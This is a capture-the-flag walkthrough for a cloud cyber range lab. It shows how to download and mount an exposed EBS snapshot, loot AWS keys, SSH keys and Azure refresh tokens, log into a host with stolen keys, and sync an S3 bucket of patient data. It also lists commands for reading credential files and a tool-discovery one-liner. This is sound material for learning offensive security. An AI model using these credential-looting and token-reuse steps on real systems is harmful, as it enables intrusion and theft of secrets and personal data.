
Thunderdome - Pulled From the Sky walkthrough

This is the second in a series of walkthroughs for the Thunderdome multi-cloud Cyber Range from Pwned Labs. This post will guide you through capturing the second flag, "Pulled From the Sky". In the process, I will cover various tools and techniques, showing that there are multiple ways to achieve an objective.

Beginners can benefit from replicating this tradecraft, and even pros might learn a new thing or two! Walkthroughs also give me the opportunity to solidify and refresh my own understanding of offensive security concepts.

Recap  🧵


This walkthrough follows on from flag 1 - Emerge Through the Breach. Let’s recap what we did to capture flag 1!

In the writeup for flag 1, I gave a little hint of what to expect for flag 2...

Make a note of the above, it's a snapshot (ahem) of what you'll need for the next flag!

So let's go ahead and grab the snapshot arn:aws:ec2:us-east-1:211125382880:snapshot/snap-0c241b0d00d234853 that we discovered during our CloudFox enumeration and examine it locally. Here's the CloudFox inventory again:

When I was going through the inventory it wasn’t obvious that the next step to finding flag 2 would be the snapshot (although I had a strong suspicion). CloudFox suggested some steps that could be taken to achieve Remote Code Execution on the discovered EC2 instances - i-0874ad63d9693239c and i-0d67cb27d5cc12605. However, attempting RCE wasn't successful.

In the loot file instances-ec2PublicIPs.txt we find the EC2 public IPs. The first IP address belongs to the out-of-scope admin box, and the second (web-prod) was our starting point. We don’t need to focus on the public IPs right now.

There is also an EC2 AMI (Amazon Machine Image) that I wasn't able to do anything with, so it looks like that’s not the path we should be going down. Let's turn our attention to the snapshot snap-0c241b0d00d234853 !


Snapshot enumeration  🧐


You can make snapshots public or share them with specific AWS accounts you own or control. Reading a snapshot typically involves creating a volume from the snapshot and attaching it to an EC2 instance. There’s also another method: downloading the snapshot locally using the CLI, which is the technique we'll focus on. I'll demonstrate a couple of ways we can do this.
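For reference, the classic volume route can be sketched like this. MY_INSTANCE_ID is a placeholder for an instance you control, and the block only runs if you explicitly set it, so the sketch is safe to paste:

```shell
# Sketch of the classic approach: snapshot -> new volume -> attach to our own instance.
# MY_INSTANCE_ID is a placeholder; nothing runs unless you set it deliberately.
SNAP=snap-0c241b0d00d234853
if [ -n "${MY_INSTANCE_ID:-}" ]; then
  VOL=$(aws ec2 create-volume --snapshot-id "$SNAP" --availability-zone us-east-1a \
        --query VolumeId --output text)
  aws ec2 attach-volume --volume-id "$VOL" --instance-id "$MY_INSTANCE_ID" --device /dev/sdf
fi
```

Once attached, you would mount /dev/sdf (or however the kernel names it) and browse the filesystem from your own box.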


You can fire up Pacu (we used it during the flag 1 walkthrough, if you remember) and check out these two modules: ebs__enum_volumes_snapshots (enumerates snapshots) and ebs__download_snapshots (downloads snapshots). Run the former, then the latter. The output path for enumeration findings is ~/.local/share/pacu/<session_name>/downloads.

$ run ebs__enum_volumes_snapshots --regions us-east-1


The ebs__download_snapshots module had some bugs but they have been fixed in release 1.5.3.

$ run ebs__download_snapshots --snapshot-id snap-0c241b0d00d234853 --region us-east-1


Instead of using Pacu's ebs__download_snapshots we can also use dsnap directly (the library that the ebs__download_snapshots module is built on). The primary benefit of the Pacu module is that it reduces unnecessary API calls, but as a tradeoff it lacks some of the niceties included with dsnap. If you're conducting a penetration test or taking part in a CTF, you’re probably not too concerned about making a lot of noise (such as unnecessary API calls). After installing dsnap (using the instructions in the link above), we can list and download the snapshot.

First, set the AWS credentials we gained and list the snapshot with dsnap list

Download the snapshot with dsnap get
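Put together, the two dsnap steps might look like this (a sketch — "haru" is just the profile name I used for the looted keys):

```shell
# Enumerate and pull the snapshot with dsnap; the "haru" profile name is illustrative.
export AWS_PROFILE=haru
export AWS_DEFAULT_REGION=us-east-1

# Guarded so the sketch is harmless where dsnap isn't installed
if command -v dsnap >/dev/null 2>&1; then
  dsnap list                          # list snapshots visible to these credentials
  dsnap get snap-0c241b0d00d234853    # writes snap-0c241b0d00d234853.img to the CWD
fi
```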

You should now have the snapshot downloaded to your current working directory:

There are different ways to mount the image and examine its contents, with the exact process depending on your local setup and OS. We'll mount the snapshot in a Docker container. I used the instructions in the link below to build the Docker container for mounting the snapshot -

$ git clone
$ cd dsnap
$ make docker/build

Run the Docker container and mount the snapshot:

$ docker run -it -v "/root/thunderdome/flag2/snap-0c241b0d00d234853.img:/disks/snap-0c241b0d00d234853.img" -w /disks dsnap-mount --ro -a "snap-0c241b0d00d234853.img" -m /dev/sda1:/


A note on using Guestfish:

Guestfish is a command-line tool that's used to access and manipulate virtual machine disk images and filesystems. It's part of the libguestfs suite, which provides a set of tools for accessing and modifying virtual machine (VM) disk images without the need to boot the VM. For the most part, typical Linux commands work (with some nuances):

With guestfish, if you were to ls a user’s home directory, hidden files are returned by default (on a typical Linux box you’d need to run something like ls -la to see them).

Also, as we saw in the ls output above, there's no current working directory, so pwd returns an error:

You can’t cd to a directory but you can ls it:
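To tie these nuances together, here's a one-shot, non-interactive guestfish session against the downloaded image (a sketch — /dev/sda1 matches the device we passed to the container mount, and guestfish reads commands from stdin):

```shell
# Run a few read-only guestfish commands non-interactively against the image.
IMG=snap-0c241b0d00d234853.img
if command -v guestfish >/dev/null 2>&1 && [ -f "$IMG" ]; then
  guestfish --ro -a "$IMG" -m /dev/sda1:/ <<'EOF'
ls /root
cat /etc/hostname
EOF
fi
```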

Let’s note the hostname:

We’ve seen this address before: it’s the internal DNS hostname for an EC2 instance, and it appeared in our nmap output for flag 1:

Service Info: Host: ip-172-31-90-229.ec2.internal

It looks like it's the private IP address for web-prod, the box that hosts the Massive Pharma external website. We already know web-prod's public IP address, and we can confirm the mapping with the AWS CLI command below, using Haru’s credentials.


$ aws ec2 describe-instances --region us-east-1 --profile haru --query "Reservations[*].Instances[*].{Name:Tags[?Key=='Name'].Value|[0],PublicIpAddress:PublicIpAddress,PrivateIpAddress:PrivateIpAddress}" --output table



The address embedded in /etc/hostname from the snapshot matches web-prod's name and private IP address. Alternatively, we can describe the snapshot to identify the volume it was taken from, and then describe the volumes to see which EC2 instance that volume was attached to:

snap-0c241b0d00d234853 (snapshot) --> vol-05ada6051c8801cad (volume) --> i-0d67cb27d5cc12605 (EC2 instance: web-prod)
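Sketched with the AWS CLI, that chain can be followed in two read-only describe calls (the haru profile name is illustrative; the guard skips the calls when no live credentials are present):

```shell
# snapshot -> volume -> instance, via read-only describe calls
SNAP=snap-0c241b0d00d234853
if command -v aws >/dev/null 2>&1 && aws sts get-caller-identity --profile haru >/dev/null 2>&1; then
  VOL=$(aws ec2 describe-snapshots --snapshot-ids "$SNAP" --region us-east-1 --profile haru \
        --query 'Snapshots[0].VolumeId' --output text)
  aws ec2 describe-volumes --volume-ids "$VOL" --region us-east-1 --profile haru \
        --query 'Volumes[0].Attachments[0].InstanceId' --output text
fi
```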

Hunting for loot  💰

There are a number of key files and directories we want to look at. Here’s a quick list (not definitive) of some files that can help us on the hunt for the next flag... I’ve limited the commands to ls and cat due to the restricted shell:

ls /root
ls /root/.ssh
cat /root/.ssh/id_rsa
cat /root/.ssh/authorized_keys
ls /home
ls /home/<user>/.aws
cat /home/<user>/.aws/credentials
ls /home/<user>/.azure
ls /home/<user>/.config/gcloud/
cat /home/<user>/.config/gcloud/credentials.db
cat /home/<user>/.ssh/id_rsa
cat /home/<user>/.ssh/authorized_keys
cat /home/<user>/.ssh/known_hosts
cat /etc/environment
cat /home/<user>/.bash_history
cat /etc/passwd
cat /etc/group
cat /etc/crontab
ls /var/log
ls /var/spool/cron/crontabs
cat /etc/hosts

Let’s have a look around. The root of the file system doesn't show anything too interesting.

Listing the contents of /root we see a .aws folder.

With AWS credentials inside!  We'll add these to our loot stash.

Next let's check out home directories.

I browsed through the haru and ubuntu home directories but didn’t find anything interesting. In Nacer’s directory, however, we also find AWS access keys! These could prove useful and we’ll add them to our loot stash as well.

Speaking of AWS access keys - looking at root’s crontab it seems that Nacer's AWS keys are periodically rotated on the host. This is information that might be useful later.


We also find Nacer’s SSH private key, which we can copy locally and later use to try to log into web-prod.

Moving into the .azure directory we see Nacer’s Azure environment configuration. This directory is created by the Azure CLI. The file azureProfile.json shows the Azure tenant ID and subscription ID:

We also see the file msal_token_cache.json that contains Nacer’s Azure access and refresh tokens - this is a significant find!

These tokens can potentially help us move further within the organization and pivot to Massive Pharma's Azure environment.

We can try to use the refresh token to request access tokens not only for Azure Resource Manager, but also for Microsoft Graph and M365 resources such as Teams chats and Outlook emails. For more information on the differences between access tokens and refresh tokens, check out this lab:
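As a sketch of what that exchange looks like: the request below targets the v2.0 token endpoint using the well-known Azure CLI client ID. TENANT_ID and REFRESH_TOKEN are placeholders for the values we looted, and the request only fires if you've exported them:

```shell
# Build the token request body; 04b07795-8ddb-461a-bbee-02f9e1bf7b46 is the
# well-known Azure CLI application (client) ID. Placeholders stay redacted.
BODY="client_id=04b07795-8ddb-461a-bbee-02f9e1bf7b46&grant_type=refresh_token&refresh_token=${REFRESH_TOKEN:-REDACTED}&scope=https://graph.microsoft.com/.default"

# Only send it when real values have been exported
if [ -n "${REFRESH_TOKEN:-}" ] && [ -n "${TENANT_ID:-}" ]; then
  curl -s "https://login.microsoftonline.com/${TENANT_ID}/oauth2/v2.0/token" -d "$BODY"
fi
```

Swapping the scope (e.g. to https://management.azure.com/.default) targets a different resource with the same refresh token.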



Access to EC2  🟧


Time to check out the SSH key. After running chmod 600 nacer_ssh.pem we successfully connect to web-prod as Nacer!
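The connection itself is just the following (a sketch — WEB_PROD_IP is a placeholder for web-prod's public IP):

```shell
# SSH in as nacer with the looted key; private keys must be mode 600 or ssh refuses them.
if [ -f nacer_ssh.pem ]; then
  chmod 600 nacer_ssh.pem
  ssh -i nacer_ssh.pem -o ConnectTimeout=10 "nacer@${WEB_PROD_IP:-<web-prod-ip>}"
fi
```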

Note the banner highlighted above, which correlates with the cron job we saw earlier regarding rotated AWS access keys. After gaining access to the EC2 instance we can try to gain situational awareness and look for ways to escalate privileges using a combination of manual exploration and tools. To check what useful software exists on the box that we may be able to leverage, you can run the following HackTricks one-liner:

$ which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null


We see a few tools above that would definitely come in handy. Depending on permissions and egress restrictions, you could also download tooling on to the host via curl or wget, or use netcat to run a port scan, exfiltrate data, and a lot more.

We’re not going to spend too much time on the box, but let’s look around some more and check for ssh keys. Something to note about running ls with a wildcard * (as in the ls -alh /home/*/.ssh/ example below) against directories belonging to other users is that it doesn’t return any output for directories to which you don’t have permissions, even if the path exists:

We see keys for nacer but we already have this key, so let’s move on and look for Cloud credentials in the default locations:

$ ls -alh /home/*/.aws/
$ ls -alh /home/*/.azure
$ ls -alh /home/*/.config/gcloud/

The output above shows AWS credentials and Azure credentials for nacer. Let’s take a closer look!

These AWS keys are different to the ones we found in the snapshot, due to the daily rotation of AWS keys.

Let’s see if any AWS credentials are currently active on the box:
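The quickest check is sts get-caller-identity, which reports whichever principal the environment resolves to (env vars, a profile, or an instance role). The guard just keeps the sketch inert where no credentials exist:

```shell
# Who am I, as far as AWS is concerned?
if command -v aws >/dev/null 2>&1 && aws sts get-caller-identity >/dev/null 2>&1; then
  aws sts get-caller-identity --output json   # prints UserId, Account and Arn
fi
```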

From the above output we have the following AWS information:

AWS account ID: 211125382880

We can use the AWS credentials we found for Nacer and enumerate from our attacker machine, but we need to be aware that the credentials are rotated daily. Also, there may be Condition definitions (such as aws:SourceVpc or aws:SourceIp) applied to IAM or resource policies, which could block our enumeration attempts from outside the host. Controls like these would have been fundamental in limiting the blast radius of the Capital One breach, but that’s another story... With that said, let's use the AWS credentials on our local machine and come back to web-prod if needed.

Let’s configure Nacer’s credentials locally and see if we can list S3 buckets:

We get an AccessDenied message. Let’s see if this has anything to do with IAM Condition definitions we were talking about earlier and run the same command on web-prod:

We still get AccessDenied, so it may be related to Nacer’s permissions. I tried various AWS CLI commands to view permissions, and also tried iam simulate-principal-policy to get an idea of which permissions may be in effect, but no joy (it looks like Nacer lacks permissions like iam:ListUserPolicies and iam:ListAttachedUserPolicies). I did some automated enumeration with CloudFox but didn’t find anything of interest beyond what we learned in the previous flag, so we’ll have to do some manual enumeration. Since listing all S3 buckets is not allowed, how about listing a particular S3 bucket?

We’ll need a bucket in the account to try this with… remember the one we gathered from one of the Bitbucket commits in flag 1? It was mp-clinical-trial-data . Let’s try the command again on our local machine, but this time we’ll mention this bucket specifically.
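The targeted listing only needs s3:ListBucket on that one bucket (a guarded sketch, with the nacer profile as configured earlier):

```shell
# List one named bucket directly rather than enumerating all buckets
BUCKET=mp-clinical-trial-data
if command -v aws >/dev/null 2>&1 && aws sts get-caller-identity --profile nacer >/dev/null 2>&1; then
  aws s3 ls "s3://${BUCKET}" --profile nacer
fi
```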

Success! But wait - we weren't able to execute aws s3 ls so why were we able to execute aws s3 ls s3://mp-clinical-trial-data ? This could be because although Nacer doesn't have s3:ListAllMyBuckets permissions, he does have s3:ListBucket permissions for mp-clinical-trial-data specifically. He may also have other permissions on this bucket (such as s3:GetObject).

Let’s try and download all the content in mp-clinical-trial-data to our local machine. We can do this by running aws s3 sync s3://mp-clinical-trial-data . --profile nacer . Something to note is that aws s3 sync works recursively by default. We should now see the following:

Okay, now let's check the contents of those downloaded directories.

There’s the second flag! But we're never done with just the flag, we need something that will help us move deeper within Massive Pharma. Grab the flag, submit it, and have a look at the .csv file:

The file looks like a list of clinical trial candidates and their medical information. It's not information that should be readily available, but it's of no use to us at the moment. Let’s turn our attention to admin-temp, where we see a file called openemr-5.0.2.tar.gz. We’ll extract it and see what we can find:

Ok, so what’s OpenEMR? Apparently it’s a "Free and Open Source electronic health records and medical practice management application". See here if you want to read more. I had a look around various files and directories but didn’t find anything interesting. I also ran TruffleHog (a secrets scanning tool) against the directory with ./trufflehog filesystem <path>/mp-clinical-trial-data/admin-temp/openemr-5.0.2/ but nothing particularly helpful was flagged. It returned a bunch of false positives, but the Detector Type: SQLServer entries are interesting and something we should probably note:

What about the Azure credentials we found?

Heading back to web-prod we can also check if any Azure credentials are currently active on the box:
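The Azure CLI equivalent of the whoami check is az account show, which reads the cached session under ~/.azure (guarded so the sketch is inert without a session):

```shell
# Is there a live Azure CLI session on this box?
if command -v az >/dev/null 2>&1 && az account show >/dev/null 2>&1; then
  az account show --query '{user:user.name, tenant:tenantId, subscription:id}' -o json
fi
```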

From the above output we confirm that we have compromised the Azure user and can start to gain situational awareness!

Trying to pull the active access token via az account get-access-token directly on web-prod failed, possibly due to permissions issues on the msal_token_cache.json file. We can cat the file, however. Let’s grab the output and keep it on our local machine.
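Once the cache contents are on our machine, we can peek inside the tokens offline: a JWT's payload is just base64url-encoded JSON, so a small helper using only coreutils (a sketch, nothing Azure-specific) reveals claims like the audience and expiry:

```shell
# Print the payload (middle segment) of a JWT, e.g. one lifted from msal_token_cache.json.
jwt_payload() {
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')   # base64url -> base64
  case $(( ${#seg} % 4 )) in                             # restore stripped '=' padding
    2) seg="${seg}==" ;;
    3) seg="${seg}=" ;;
  esac
  printf '%s' "$seg" | base64 -d
}
# Usage: jwt_payload "$ACCESS_TOKEN"   # prints JSON containing claims like "aud" and "exp"
```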

Next time we'll run through using the Azure credentials we’ve found, and look at the importance of, *ahem* "Teams work" and poking databases with pointy things.

See you then!